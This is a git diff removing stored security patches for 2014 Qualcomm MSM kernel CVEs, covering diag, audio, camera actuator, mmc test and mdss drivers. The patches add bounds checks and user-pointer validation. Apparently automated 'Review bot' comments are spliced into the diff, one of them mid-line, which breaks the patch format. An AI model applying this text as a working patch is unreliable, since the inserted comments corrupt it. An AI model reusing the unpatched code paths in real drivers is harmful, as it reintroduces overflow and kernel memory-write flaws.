-74,6 +75,7 @@ struct diag_dci_client_tbl { - - /* This is used for DCI health stats */ - struct diag_dci_health_stats { -+ int client_id; - int dropped_logs; - int dropped_events; - int received_logs; -@@ -119,6 +121,8 @@ int 
diag_process_smd_dci_read_data(struct diag_smd_info *smd_info, void *buf, - int recd_bytes); - int diag_process_dci_transaction(unsigned char *buf, int len); - void extract_dci_pkt_rsp(struct diag_smd_info *smd_info, unsigned char *buf); -+ -+int diag_dci_find_client_index_health(int client_id); - int diag_dci_find_client_index(int client_id); - /* DCI Log streaming functions */ - void create_dci_log_mask_tbl(unsigned char *tbl_buf); -diff --git a/drivers/char/diag/diagchar_core.c b/drivers/char/diag/diagchar_core.c -index 9a4e108..0e475c9 100644 ---- a/drivers/char/diag/diagchar_core.c -+++ b/drivers/char/diag/diagchar_core.c -@@ -943,6 +943,8 @@ long diagchar_ioctl(struct file *filp, - for (i = 0; i < MAX_DCI_CLIENTS; i++) { - if (driver->dci_client_tbl[i].client == NULL) { - driver->dci_client_tbl[i].client = current; -+ driver->dci_client_tbl[i].client_id = -+ driver->dci_client_id; - driver->dci_client_tbl[i].list = - dci_params->list; - driver->dci_client_tbl[i].signal_type = -@@ -1043,7 +1045,7 @@ long diagchar_ioctl(struct file *filp, - sizeof(struct diag_dci_health_stats))) - return -EFAULT; - mutex_lock(&dci_health_mutex); -- i = diag_dci_find_client_index(current->tgid); -+ i = diag_dci_find_client_index_health(stats.client_id); - if (i != DCI_CLIENT_INDEX_INVALID) { - dci_params = &(driver->dci_client_tbl[i]); - stats.dropped_logs = dci_params->dropped_logs; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2014-9873/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9873/ANY/0001.patch deleted file mode 100644 index d619ae2f..00000000 --- a/Patches/Linux_CVEs/CVE-2014-9873/ANY/0001.patch +++ /dev/null 
@@ -1,35 +0,0 @@ -From ef29ae1d40536fef7fb95e4d5bb5b6b57bdf9420 Mon Sep 17 00:00:00 2001 -From: Katish Paran -Date: Tue, 17 Dec 2013 13:36:15 +0530 -Subject: diag: dci: Safeguard to prevent Integer Underflow and Memory Leak - -At certain point in diag driver there can be integer underflow -thus can lead to memory leak. Added a safeguard for that. - -Change-Id: I2a0304f5b9888fe12ca9ef5fbaa9a68ee4ab9c15 -Crs-fixed: 556860 -Signed-off-by: Katish Paran ---- - drivers/char/diag/diag_dci.c | 6 +++++- - 1 file changed, 5 insertions(+), 1 deletion(-) - -diff --git a/drivers/char/diag/diag_dci.c b/drivers/char/diag/diag_dci.c -index 7772ebe..414207f 100644 ---- a/drivers/char/diag/diag_dci.c -+++ b/drivers/char/diag/diag_dci.c -@@ -216,7 +216,11 @@ void extract_dci_pkt_rsp(struct diag_smd_info *smd_info, unsigned char *buf) - if (recv_pkt_cmd_code != DCI_PKT_RSP_CODE) - cmd_code_len = 4; /* delayed response */ - write_len = (int)(*(uint16_t *)(buf+2)) - cmd_code_len; -- -+ if (write_len <= 0) { -+ pr_err("diag: Invalid length in %s, write_len: %d", -+ __func__, write_len); -+ return; -+ } - pr_debug("diag: len = %d\n", write_len); - tag = (int *)(buf + (4 + cmd_code_len)); /* Retrieve the Tag field */ - req_entry = diag_dci_get_request_entry(*tag); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2014-9874/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9874/ANY/0001.patch deleted file mode 100644 index 31191d4d..00000000 --- a/Patches/Linux_CVEs/CVE-2014-9874/ANY/0001.patch +++ /dev/null 
@@ -1,64 +0,0 @@ -From 56ff68b1f93eaf22e5e0284648fd862dc08c9236 Mon Sep 17 00:00:00 2001 -From: Mohammad Johny Shaik -Date: Thu, 12 Dec 2013 14:26:42 +0530 -Subject: Asoc:msm:Added Buffer overflow check - -The overflow check is required to ensure that user space data -in kernel may not go beyond buffer boundary. - -Change-Id: I79b7e5f875fadcaeceb05f9163ae3666d4b6b7e1 -CRs-Fixed: 563086 -Signed-off-by: Mohammad Johny Shaik ---- - arch/arm/mach-msm/qdsp6v2/audio_utils.c | 6 ++++++ - sound/soc/msm/qdsp6v2/q6asm.c | 3 +++ - 2 files changed, 9 insertions(+) - -diff --git a/arch/arm/mach-msm/qdsp6v2/audio_utils.c b/arch/arm/mach-msm/qdsp6v2/audio_utils.c -index 2a245f8..b8e55f9 100644 ---- a/arch/arm/mach-msm/qdsp6v2/audio_utils.c -+++ b/arch/arm/mach-msm/qdsp6v2/audio_utils.c -@@ -23,6 +23,7 @@ - #include - #include "audio_utils.h" - -+#define FRAME_SIZE (1 + ((1536+sizeof(struct meta_out_dsp)) * 5)) - static int audio_in_pause(struct q6audio_in *audio) - { - int rc; -@@ -258,6 +259,11 @@ long audio_in_ioctl(struct file *file, - rc = -EINVAL; - break; - } -+ if ((cfg.buffer_size > FRAME_SIZE) || -+ (cfg.buffer_count != FRAME_NUM)) { -+ rc = -EINVAL; -+ break; -+ } - audio->str_cfg.buffer_size = cfg.buffer_size; - audio->str_cfg.buffer_count = cfg.buffer_count; - rc = q6asm_audio_client_buf_alloc(OUT, audio->ac, -diff --git a/sound/soc/msm/qdsp6v2/q6asm.c b/sound/soc/msm/qdsp6v2/q6asm.c -index 82b92aa9..09c40d6 100644 ---- a/sound/soc/msm/qdsp6v2/q6asm.c -+++ b/sound/soc/msm/qdsp6v2/q6asm.c -@@ -55,6 +55,7 @@ - #define READDONE_IDX_FLAGS 8 - #define READDONE_IDX_NUMFRAMES 9 - #define READDONE_IDX_SEQ_ID 10 -+#define FRAME_NUM (8) - - /* TODO, combine them together */ - static DEFINE_MUTEX(session_lock); -@@ -608,6 +609,8 @@ int q6asm_audio_client_buf_alloc(unsigned int dir, - pr_debug("%s: buffer already allocated\n", __func__); - return 0; - } -+ if (bufcnt != FRAME_NUM) -+ goto fail; - mutex_lock(&ac->cmd_lock); - buf = kzalloc(((sizeof(struct audio_buffer))*bufcnt), - 
GFP_KERNEL); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2014-9875/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9875/ANY/0001.patch deleted file mode 100644 index de34d9da..00000000 --- a/Patches/Linux_CVEs/CVE-2014-9875/ANY/0001.patch +++ /dev/null 
@@ -1,246 +0,0 @@ -From b77c694b88a994d077316c157168c710696f8805 Mon Sep 17 00:00:00 2001 -From: Ravi Aravamudhan -Date: Tue, 4 Jun 2013 10:10:11 -0700 -Subject: diag: dci: Check for request pkt length being lesser than minimum - length - -Added checks for DCI request packets to be greater than the minimum -packet length. We would drop the request and print an error otherwise. - -CRs-Fixed: 483310 -Change-Id: I0d89ded58ee97a08ebe6b06b411ac17d2fcb11df -Signed-off-by: Ravi Aravamudhan ---- - drivers/char/diag/diag_dci.c | 114 ++++++++++++++++++++++++++++++++++--------- - drivers/char/diag/diag_dci.h | 3 ++ - 2 files changed, 93 insertions(+), 24 deletions(-) - -diff --git a/drivers/char/diag/diag_dci.c b/drivers/char/diag/diag_dci.c -index 9b404c6..fa0e9d7 100644 ---- a/drivers/char/diag/diag_dci.c -+++ b/drivers/char/diag/diag_dci.c -@@ -375,16 +375,23 @@ void diag_dci_notify_client(int peripheral_mask, int data) - int diag_send_dci_pkt(struct diag_master_table entry, unsigned char *buf, - int len, int index) - { -- int i; -- int status = 0; -+ int i, status = 0; -+ unsigned int read_len = 0; - -- /* remove UID from user space pkt before sending to peripheral */ -- buf = buf + 4; -+ /* The first 4 bytes is the uid tag and the next four bytes is -+ the minmum packet length of a request packet */ -+ if (len < DCI_PKT_REQ_MIN_LEN) { -+ pr_err("diag: dci: Invalid pkt len %d in %s\n", len, __func__); -+ return -EIO; -+ } - if (len > APPS_BUF_SIZE - 10) { -- pr_err("diag: dci: buffer overwrite possible since payload bigger than buf size\n"); -+ pr_err("diag: dci: Invalid payload length in %s\n", __func__); - return -EIO; - } -- len = len - 4; -+ /* remove UID from user space pkt before sending to peripheral*/ -+ buf = buf + sizeof(int); -+ read_len += sizeof(int); -+ len = len - sizeof(int); - mutex_lock(&driver->dci_mutex); - /* prepare DCI packet */ - driver->apps_dci_buf[0] = CONTROL_CHAR; /* start */ -@@ -395,7 +402,13 @@ int diag_send_dci_pkt(struct diag_master_table 
entry, unsigned char *buf, - driver->req_tracking_tbl[index].tag; - for (i = 0; i < len; i++) - driver->apps_dci_buf[i+9] = *(buf+i); -+ read_len += len; - driver->apps_dci_buf[9+len] = CONTROL_CHAR; /* end */ -+ if ((read_len + 9) >= USER_SPACE_DATA) { -+ pr_err("diag: dci: Invalid length while forming dci pkt in %s", -+ __func__); -+ return -EIO; -+ } - - for (i = 0; i < NUM_SMD_DCI_CHANNELS; i++) { - struct diag_smd_info *smd_info = driver->separate_cmdrsp[i] ? -@@ -449,10 +462,10 @@ int diag_process_dci_transaction(unsigned char *buf, int len) - { - unsigned char *temp = buf; - uint16_t subsys_cmd_code, log_code, item_num; -- int subsys_id, cmd_code, ret = -1, index = -1, found = 0, read_len = 0; -+ int subsys_id, cmd_code, ret = -1, index = -1, found = 0; - struct diag_master_table entry; - int count, set_mask, num_codes, bit_index, event_id, offset = 0, i; -- unsigned int byte_index; -+ unsigned int byte_index, read_len = 0; - uint8_t equip_id, *log_mask_ptr, *head_log_mask_ptr, byte_mask; - uint8_t *event_mask_ptr; - -@@ -462,15 +475,24 @@ int diag_process_dci_transaction(unsigned char *buf, int len) - return DIAG_DCI_SEND_DATA_FAIL; - } - -+ if (!temp) { -+ pr_err("diag: Invalid buffer in %s\n", __func__); -+ } -+ - /* This is Pkt request/response transaction */ - if (*(int *)temp > 0) { -+ if (len < DCI_PKT_REQ_MIN_LEN || len > USER_SPACE_DATA) { -+ pr_err("diag: dci: Invalid length %d len in %s", len, -+ __func__); -+ return -EIO; -+ } - /* enter this UID into kernel table and return index */ - index = diag_register_dci_transaction(*(int *)temp); - if (index < 0) { - pr_alert("diag: registering new DCI transaction failed\n"); - return DIAG_DCI_NO_REG; - } -- temp += 4; -+ temp += sizeof(int); - /* - * Check for registered peripheral and fwd pkt to - * appropriate proc -@@ -480,7 +502,12 @@ int diag_process_dci_transaction(unsigned char *buf, int len) - subsys_id = (int)(*(char *)temp); - temp++; - subsys_cmd_code = *(uint16_t *)temp; -- temp += 2; -+ temp 
+= sizeof(uint16_t); -+ read_len += sizeof(int) + 2 + sizeof(uint16_t); -+ if (read_len >= USER_SPACE_DATA) { -+ pr_err("diag: dci: Invalid length in %s\n", __func__); -+ return -EIO; -+ } - pr_debug("diag: %d %d %d", cmd_code, subsys_id, - subsys_cmd_code); - for (i = 0; i < diag_max_reg; i++) { -@@ -514,6 +541,12 @@ int diag_process_dci_transaction(unsigned char *buf, int len) - } - } - } else if (*(int *)temp == DCI_LOG_TYPE) { -+ /* Minimum length of a log mask config is 12 + 2 bytes for -+ atleast one log code to be set or reset */ -+ if (len < DCI_LOG_CON_MIN_LEN || len > USER_SPACE_DATA) { -+ pr_err("diag: dci: Invalid length in %s\n", __func__); -+ return -EIO; -+ } - /* find client id and table */ - i = diag_dci_find_client_index(current->tgid); - if (i == DCI_CLIENT_INDEX_INVALID) { -@@ -521,21 +554,33 @@ int diag_process_dci_transaction(unsigned char *buf, int len) - return ret; - } - /* Extract each log code and put in client table */ -- temp += 4; -- read_len += 4; -+ temp += sizeof(int); -+ read_len += sizeof(int); - set_mask = *(int *)temp; -- temp += 4; -- read_len += 4; -+ temp += sizeof(int); -+ read_len += sizeof(int); - num_codes = *(int *)temp; -- temp += 4; -- read_len += 4; -+ temp += sizeof(int); -+ read_len += sizeof(int); -+ -+ if (num_codes == 0 || (num_codes >= (USER_SPACE_DATA - 8)/2)) { -+ pr_err("diag: dci: Invalid number of log codes %d\n", -+ num_codes); -+ return -EIO; -+ } - - head_log_mask_ptr = driver->dci_client_tbl[i].dci_log_mask; -+ if (!head_log_mask_ptr) { -+ pr_err("diag: dci: Invalid Log mask pointer in %s\n", -+ __func__); -+ return -ENOMEM; -+ } - pr_debug("diag: head of dci log mask %p\n", head_log_mask_ptr); - count = 0; /* iterator for extracting log codes */ - while (count < num_codes) { - if (read_len >= USER_SPACE_DATA) { -- pr_err("diag: dci: Log type, possible buffer overflow\n"); -+ pr_err("diag: dci: Invalid length for log type in %s", -+ __func__); - return -EIO; - } - log_code = *(uint16_t *)temp; -@@ 
-589,6 +634,12 @@ int diag_process_dci_transaction(unsigned char *buf, int len) - /* send updated mask to peripherals */ - ret = diag_send_dci_log_mask(driver->smd_cntl[MODEM_DATA].ch); - } else if (*(int *)temp == DCI_EVENT_TYPE) { -+ /* Minimum length of a event mask config is 12 + 4 bytes for -+ atleast one event id to be set or reset. */ -+ if (len < DCI_EVENT_CON_MIN_LEN || len > USER_SPACE_DATA) { -+ pr_err("diag: dci: Invalid length in %s\n", __func__); -+ return -EIO; -+ } - /* find client id and table */ - i = diag_dci_find_client_index(current->tgid); - if (i == DCI_CLIENT_INDEX_INVALID) { -@@ -596,21 +647,36 @@ int diag_process_dci_transaction(unsigned char *buf, int len) - return ret; - } - /* Extract each log code and put in client table */ -- temp += 4; -- read_len += 4; -+ temp += sizeof(int); -+ read_len += sizeof(int); - set_mask = *(int *)temp; -- temp += 4; -- read_len += 4; -+ temp += sizeof(int); -+ read_len += sizeof(int); - num_codes = *(int *)temp; -- temp += 4; -- read_len += 4; -+ temp += sizeof(int); -+ read_len += sizeof(int); -+ -+ /* Check for positive number of event ids. 
Also, the number of -+ event ids should fit in the buffer along with set_mask and -+ num_codes which are 4 bytes each */ -+ if (num_codes == 0 || (num_codes >= (USER_SPACE_DATA - 8)/2)) { -+ pr_err("diag: dci: Invalid number of event ids %d\n", -+ num_codes); -+ return -EIO; -+ } - - event_mask_ptr = driver->dci_client_tbl[i].dci_event_mask; -+ if (!event_mask_ptr) { -+ pr_err("diag: dci: Invalid event mask pointer in %s\n", -+ __func__); -+ return -ENOMEM; -+ } - pr_debug("diag: head of dci event mask %p\n", event_mask_ptr); - count = 0; /* iterator for extracting log codes */ - while (count < num_codes) { - if (read_len >= USER_SPACE_DATA) { -- pr_err("diag: dci: Event type, possible buffer overflow\n"); -+ pr_err("diag: dci: Invalid length for event type in %s", -+ __func__); - return -EIO; - } - event_id = *(int *)temp; -diff --git a/drivers/char/diag/diag_dci.h b/drivers/char/diag/diag_dci.h -index 4dc1bfc..d530de9 100644 ---- a/drivers/char/diag/diag_dci.h -+++ b/drivers/char/diag/diag_dci.h -@@ -24,6 +24,9 @@ - #define DISABLE_LOG_MASK 0 - #define MAX_EVENT_SIZE 512 - #define DCI_CLIENT_INDEX_INVALID -1 -+#define DCI_PKT_REQ_MIN_LEN 8 -+#define DCI_LOG_CON_MIN_LEN 14 -+#define DCI_EVENT_CON_MIN_LEN 16 - - - /* 16 log code categories, each has: --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2014-9876/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9876/ANY/0001.patch deleted file mode 100644 index 2ab8feac..00000000 --- a/Patches/Linux_CVEs/CVE-2014-9876/ANY/0001.patch +++ /dev/null 
@@ -1,51 +0,0 @@ -From 7efd393ca08ac74b2e3d2639b0ad77da139e9139 Mon Sep 17 00:00:00 2001 -From: Mohit Aggarwal -Date: Thu, 30 May 2013 11:12:39 +0530 -Subject: diag: Fix possible underflow/overflow issues - -Add check in order to fix possible integer underflow -during HDLC encoding which may lead to buffer -overflow. Also added check for packet length to -avoid buffer overflow. - -Change-Id: I72858e7625764652571aee3154e3c2eb61655168 -CRs-Fixed: 483400 -CRs-Fixed: 483408 -Signed-off-by: Mohit Aggarwal ---- - drivers/char/diag/diagfwd.c | 11 +++++++++-- - 1 file changed, 9 insertions(+), 2 deletions(-) - -diff --git a/drivers/char/diag/diagfwd.c b/drivers/char/diag/diagfwd.c -index 05b2872..baa0a83 100644 ---- a/drivers/char/diag/diagfwd.c -+++ b/drivers/char/diag/diagfwd.c -@@ -95,7 +95,7 @@ do { \ - } while (0) - - #define CHK_OVERFLOW(bufStart, start, end, length) \ --((bufStart <= start) && (end - start >= length)) ? 1 : 0 -+((bufStart <= start) && (end - start >= length) && (length > 0)) ? 1 : 0 - - /* Determine if this device uses a device tree */ - #ifdef CONFIG_OF -@@ -1604,8 +1604,15 @@ void diag_process_hdlc(void *data, unsigned len) - - ret = diag_hdlc_decode(&hdlc); - -+ /* -+ * If the message is 3 bytes or less in length then the message is -+ * too short. A message will need 4 bytes minimum, since there are -+ * 2 bytes for the CRC and 1 byte for the ending 0x7e for the hdlc -+ * encoding -+ */ - if (hdlc.dest_idx < 4) { -- pr_err("diag: Integer underflow in hdlc processing\n"); -+ pr_err_ratelimited("diag: In %s, message is too short, len: %d," -+ " dest len: %d\n", __func__, len, hdlc.dest_idx); - return; - } - if (ret) { --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2014-9877/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9877/ANY/0001.patch deleted file mode 100644 index e9b561ac..00000000 --- a/Patches/Linux_CVEs/CVE-2014-9877/ANY/0001.patch +++ /dev/null 
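Review bot: The patched CHK_OVERFLOW macro in the first diagfwd.c hunk still leaves its arguments and the whole expansion unparenthesised, so the trailing `? 1 : 0` binds to whatever expression surrounds a use of the macro. Since the line is being touched anyway, `(((bufStart) <= (start)) && ((end) - (start) >= (length)) && ((length) > 0))` gives the same result without the precedence hazard. If `length` is unsigned at any call site, `length > 0` only rejects zero, which is worth confirming against the callers outside the hunk.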
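Review bot: In the diag_process_hdlc hunk the new `pr_err_ratelimited` prints `len` with `%d` although the signature in the hunk header declares it `unsigned`; `len: %u` matches the type. The type of `hdlc.dest_idx` is not visible here, so its specifier should be checked against the struct definition as well.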
@@ -1,94 +0,0 @@ -From f0c0112a6189747a3f24f20210157f9974477e03 Mon Sep 17 00:00:00 2001 -From: Vasko Kalanoski -Date: Fri, 4 Oct 2013 15:28:34 +0300 -Subject: msm: actuator: fix to prevent untrusted pointer to lead DoS - -fix to prevent untrusted userspace pointer in actuator kernel -driver to lead DoS - -Change-Id: I1b64270deb494530d268539e7b420be5ec79b658 -Signed-off-by: Vasko Kalanoski ---- - .../msm/camera_v2/sensor/actuator/msm_actuator.c | 26 +++++++++++++++++----- - 1 file changed, 20 insertions(+), 6 deletions(-) - -diff --git a/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c b/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c -index baa2db8..201a011 100644 ---- a/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c -+++ b/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c -@@ -196,11 +196,19 @@ static int32_t msm_actuator_piezo_move_focus( - struct msm_actuator_move_params_t *move_params) - { - int32_t dest_step_position = move_params->dest_step_pos; -+ struct damping_params_t ringing_params_kernel; - int32_t rc = 0; - int32_t num_steps = move_params->num_steps; - struct msm_camera_i2c_reg_setting reg_setting; - CDBG("Enter\n"); - -+ if (copy_from_user(&ringing_params_kernel, -+ &(move_params->ringing_params[0]), -+ sizeof(struct damping_params_t))) { -+ pr_err("copy_from_user failed\n"); -+ return -EFAULT; -+ } -+ - if (num_steps == 0) - return rc; - -@@ -208,7 +216,7 @@ static int32_t msm_actuator_piezo_move_focus( - a_ctrl->func_tbl->actuator_parse_i2c_params(a_ctrl, - (num_steps * - a_ctrl->region_params[0].code_per_step), -- move_params->ringing_params[0].hw_params, 0); -+ ringing_params_kernel.hw_params, 0); - - reg_setting.reg_setting = a_ctrl->i2c_reg_tbl; - reg_setting.data_type = a_ctrl->i2c_data_type; -@@ -230,6 +238,7 @@ static int32_t msm_actuator_move_focus( - struct msm_actuator_move_params_t *move_params) - { - int32_t rc = 0; -+ struct damping_params_t 
ringing_params_kernel; - int8_t sign_dir = move_params->sign_dir; - uint16_t step_boundary = 0; - uint16_t target_step_pos = 0; -@@ -240,6 +249,14 @@ static int32_t msm_actuator_move_focus( - int32_t num_steps = move_params->num_steps; - struct msm_camera_i2c_reg_setting reg_setting; - -+ if (copy_from_user(&ringing_params_kernel, -+ &(move_params->ringing_params[a_ctrl->curr_region_index]), -+ sizeof(struct damping_params_t))) { -+ pr_err("copy_from_user failed\n"); -+ return -EFAULT; -+ } -+ -+ - CDBG("called, dir %d, num_steps %d\n", dir, num_steps); - - if (dest_step_pos == a_ctrl->curr_step_pos) -@@ -276,9 +293,7 @@ static int32_t msm_actuator_move_focus( - a_ctrl->step_position_table[target_step_pos]; - a_ctrl->func_tbl->actuator_write_focus(a_ctrl, - curr_lens_pos, -- &(move_params-> -- ringing_params[a_ctrl-> -- curr_region_index]), -+ &ringing_params_kernel, - sign_dir, - target_lens_pos); - curr_lens_pos = target_lens_pos; -@@ -289,8 +304,7 @@ static int32_t msm_actuator_move_focus( - a_ctrl->step_position_table[target_step_pos]; - a_ctrl->func_tbl->actuator_write_focus(a_ctrl, - curr_lens_pos, -- &(move_params->ringing_params[a_ctrl-> -- curr_region_index]), -+ &ringing_params_kernel, - sign_dir, - target_lens_pos); - curr_lens_pos = target_lens_pos; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2014-9878/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9878/ANY/0001.patch deleted file mode 100644 index f370db93..00000000 --- a/Patches/Linux_CVEs/CVE-2014-9878/ANY/0001.patch +++ /dev/null 
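Review bot: msm_actuator_move_focus now copies `ringing_params[a_ctrl->curr_region_index]` once at function entry, but the two call sites it replaces (hunks -276 and -289) previously indexed with `a_ctrl->curr_region_index` at the time of each actuator_write_focus call. If the loop between them advances curr_region_index (that code is outside the hunks), later writes will use the damping parameters of the starting region; repeating the `copy_from_user` whenever the index changes would keep the old behaviour while still reading through a kernel copy. In msm_actuator_piezo_move_focus the copy is placed before the `num_steps == 0` early return, so a zero-step request with a bad pointer now fails with -EFAULT where it used to return 0.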
@@ -1,103 +0,0 @@ -From 96a62c1de93a44e6ca69514411baf4b3d67f6dee Mon Sep 17 00:00:00 2001 -From: Lee Susman -Date: Mon, 11 Nov 2013 08:53:40 +0200 -Subject: mmc: card: fix arbitrary write via read handler in mmc_block_test - -In mmc_block_test, the debug_fs based read function handlers write to an -arbitrary buffer which is given by any user. We add an access_ok check -to verify that the address pointed by *buffer is not in kernel space. -Only if the buffer is valid, do we continue the read handler. - -Change-Id: I35fe9bb70df8de92cb4d3b15c851aa9131a0e8d9 -Signed-off-by: Lee Susman ---- - drivers/mmc/card/mmc_block_test.c | 24 ++++++++++++++++++++++++ - 1 file changed, 24 insertions(+) - -diff --git a/drivers/mmc/card/mmc_block_test.c b/drivers/mmc/card/mmc_block_test.c -index ea73352..b24c367 100644 ---- a/drivers/mmc/card/mmc_block_test.c -+++ b/drivers/mmc/card/mmc_block_test.c -@@ -2219,6 +2219,9 @@ static ssize_t send_write_packing_test_read(struct file *file, - size_t count, - loff_t *offset) - { -+ if (!access_ok(VERIFY_WRITE, buffer, count)) -+ return count; -+ - memset((void *)buffer, 0, count); - - snprintf(buffer, count, -@@ -2317,6 +2320,9 @@ static ssize_t err_check_test_read(struct file *file, - size_t count, - loff_t *offset) - { -+ if (!access_ok(VERIFY_WRITE, buffer, count)) -+ return count; -+ - memset((void *)buffer, 0, count); - - snprintf(buffer, count, -@@ -2425,6 +2431,9 @@ static ssize_t send_invalid_packed_test_read(struct file *file, - size_t count, - loff_t *offset) - { -+ if (!access_ok(VERIFY_WRITE, buffer, count)) -+ return count; -+ - memset((void *)buffer, 0, count); - - snprintf(buffer, count, -@@ -2539,6 +2548,9 @@ static ssize_t write_packing_control_test_read(struct file *file, - size_t count, - loff_t *offset) - { -+ if (!access_ok(VERIFY_WRITE, buffer, count)) -+ return count; -+ - memset((void *)buffer, 0, count); - - snprintf(buffer, count, -@@ -2621,6 +2633,9 @@ static ssize_t bkops_test_read(struct file *file, - size_t 
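Review bot: The new guard in send_write_packing_test_read returns `count` when access_ok() fails, so the caller sees a successful read of `count` bytes although nothing was written; `return -EFAULT;` reports the bad pointer. The identical guard is added in err_check_test_read, send_invalid_packed_test_read, write_packing_control_test_read, bkops_test_read, long_sequential_read_test_read, long_sequential_write_test_read and new_req_notification_test_read. access_ok() only range-checks the address, and the context lines still `memset` and `snprintf` directly into the user pointer, which can fault in kernel context on an unmapped or read-only page. Formatting the text into a kernel buffer and copying it out with `simple_read_from_buffer()` would remove the direct user-memory write; each function body continues outside its hunk.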
count, - loff_t *offset) - { -+ if (!access_ok(VERIFY_WRITE, buffer, count)) -+ return count; -+ - memset((void *)buffer, 0, count); - - snprintf(buffer, count, -@@ -2709,6 +2724,9 @@ static ssize_t long_sequential_read_test_read(struct file *file, - size_t count, - loff_t *offset) - { -+ if (!access_ok(VERIFY_WRITE, buffer, count)) -+ return count; -+ - memset((void *)buffer, 0, count); - - snprintf(buffer, count, -@@ -2869,6 +2887,9 @@ static ssize_t long_sequential_write_test_read(struct file *file, - size_t count, - loff_t *offset) - { -+ if (!access_ok(VERIFY_WRITE, buffer, count)) -+ return count; -+ - memset((void *)buffer, 0, count); - - snprintf(buffer, count, -@@ -2942,6 +2963,9 @@ static ssize_t new_req_notification_test_read(struct file *file, - size_t count, - loff_t *offset) - { -+ if (!access_ok(VERIFY_WRITE, buffer, count)) -+ return count; -+ - memset((void *)buffer, 0, count); - - snprintf(buffer, count, --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2014-9879/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9879/ANY/0001.patch deleted file mode 100644 index 23bf2885..00000000 --- a/Patches/Linux_CVEs/CVE-2014-9879/ANY/0001.patch +++ /dev/null 
@@ -1,155 +0,0 @@ -From ecc8116e1befb3a764109f47ba0389434ddabbe4 Mon Sep 17 00:00:00 2001 -From: Terence Hampson -Date: Wed, 7 Aug 2013 16:54:51 -0400 -Subject: mdss: mdp3: validate histogram data passed in - -Data passed in from userspace should be validated to be within -the appropriate ranges. - -Change-Id: I50ff818a2b03c1fff55f44403f0f1b67c26d9f0e -Signed-off-by: Terence Hampson ---- - drivers/video/msm/mdss/mdp3_ctrl.c | 77 +++++++++++++++++++++++++++++++++++--- - drivers/video/msm/mdss/mdp3_dma.c | 2 +- - drivers/video/msm/mdss/mdp3_dma.h | 6 +++ - 3 files changed, 79 insertions(+), 6 deletions(-) - -diff --git a/drivers/video/msm/mdss/mdp3_ctrl.c b/drivers/video/msm/mdss/mdp3_ctrl.c -index 74e6983c..31aae26 100644 ---- a/drivers/video/msm/mdss/mdp3_ctrl.c -+++ b/drivers/video/msm/mdss/mdp3_ctrl.c -@@ -775,6 +775,64 @@ static int mdp3_get_metadata(struct msm_fb_data_type *mfd, - return ret; - } - -+int mdp3_validate_start_req(struct mdp_histogram_start_req *req) -+{ -+ if (req->frame_cnt >= MDP_HISTOGRAM_FRAME_COUNT_MAX) { -+ pr_err("%s invalid req frame_cnt\n", __func__); -+ return -EINVAL; -+ } -+ if (req->bit_mask >= MDP_HISTOGRAM_BIT_MASK_MAX) { -+ pr_err("%s invalid req bit mask\n", __func__); -+ return -EINVAL; -+ } -+ if (req->block != MDP_BLOCK_DMA_P || -+ req->num_bins != MDP_HISTOGRAM_BIN_NUM) { -+ pr_err("mdp3_histogram_start invalid request\n"); -+ return -EINVAL; -+ } -+ return 0; -+} -+ -+int mdp3_validate_scale_config(struct mdp_bl_scale_data *data) -+{ -+ if (data->scale > MDP_HISTOGRAM_BL_SCALE_MAX) { -+ pr_err("%s invalid bl_scale\n", __func__); -+ return -EINVAL; -+ } -+ if (data->min_lvl > MDP_HISTOGRAM_BL_LEVEL_MAX) { -+ pr_err("%s invalid bl_min_lvl\n", __func__); -+ return -EINVAL; -+ } -+ return 0; -+} -+ -+int mdp3_validate_csc_data(struct mdp_csc_cfg_data *data) -+{ -+ int i; -+ for (i = 0; i < 9; i++) { -+ if (data->csc_data.csc_mv[i] >= -+ MDP_HISTOGRAM_CSC_MATRIX_MAX) -+ return -EINVAL; -+ } -+ for (i = 0; i < 3; i++) { -+ if 
(data->csc_data.csc_pre_bv[i] >= -+ MDP_HISTOGRAM_CSC_VECTOR_MAX) -+ return -EINVAL; -+ if (data->csc_data.csc_post_bv[i] >= -+ MDP_HISTOGRAM_CSC_VECTOR_MAX) -+ return -EINVAL; -+ } -+ for (i = 0; i < 6; i++) { -+ if (data->csc_data.csc_pre_lv[i] >= -+ MDP_HISTOGRAM_CSC_VECTOR_MAX) -+ return -EINVAL; -+ if (data->csc_data.csc_post_lv[i] >= -+ MDP_HISTOGRAM_CSC_VECTOR_MAX) -+ return -EINVAL; -+ } -+ return 0; -+} -+ - static int mdp3_histogram_start(struct mdp3_session_data *session, - struct mdp_histogram_start_req *req) - { -@@ -782,11 +840,10 @@ static int mdp3_histogram_start(struct mdp3_session_data *session, - struct mdp3_dma_histogram_config histo_config; - - pr_debug("mdp3_histogram_start\n"); -- if (req->block != MDP_BLOCK_DMA_P || -- req->num_bins != MDP_HISTOGRAM_BIN_NUM) { -- pr_err("mdp3_histogram_start invalid request\n"); -- return -EINVAL; -- } -+ -+ ret = mdp3_validate_start_req(req); -+ if (ret) -+ return ret; - - if (!session->dma->histo_op || - !session->dma->config_histo) { -@@ -986,10 +1043,20 @@ static int mdp3_pp_ioctl(struct msm_fb_data_type *mfd, - - switch (mdp_pp.op) { - case mdp_bl_scale_cfg: -+ ret = mdp3_validate_scale_config(&mdp_pp.data.bl_scale_data); -+ if (ret) { -+ pr_err("%s: invalid scale config\n", __func__); -+ break; -+ } - ret = mdp3_bl_scale_config(mfd, (struct mdp_bl_scale_data *) - &mdp_pp.data.bl_scale_data); - break; - case mdp_op_csc_cfg: -+ ret = mdp3_validate_csc_data(&(mdp_pp.data.csc_cfg_data)); -+ 